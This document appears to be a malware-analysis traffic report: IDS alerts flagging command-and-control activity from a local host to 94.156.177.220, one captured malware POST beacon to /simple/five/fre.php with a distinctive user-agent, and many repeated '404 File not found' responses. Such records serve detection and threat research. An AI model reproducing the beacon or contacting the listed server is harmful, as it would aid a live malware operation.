2024-10-25T11:30:47.708109+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64262	94.156.177.220	80	TCP
2024-10-25T11:30:48.826402+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64263	94.156.177.220	80	TCP
2024-10-25T11:30:49.990988+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64264	94.156.177.220	80	TCP
2024-10-25T11:30:51.141273+0200	2825766	1	Malware Command and Control Activity Detected	192.168.2.18	64265	94.156.177.220	80	TCP

HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 15Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:28:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:15 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:29:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 25 Oct 2024 09:30:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
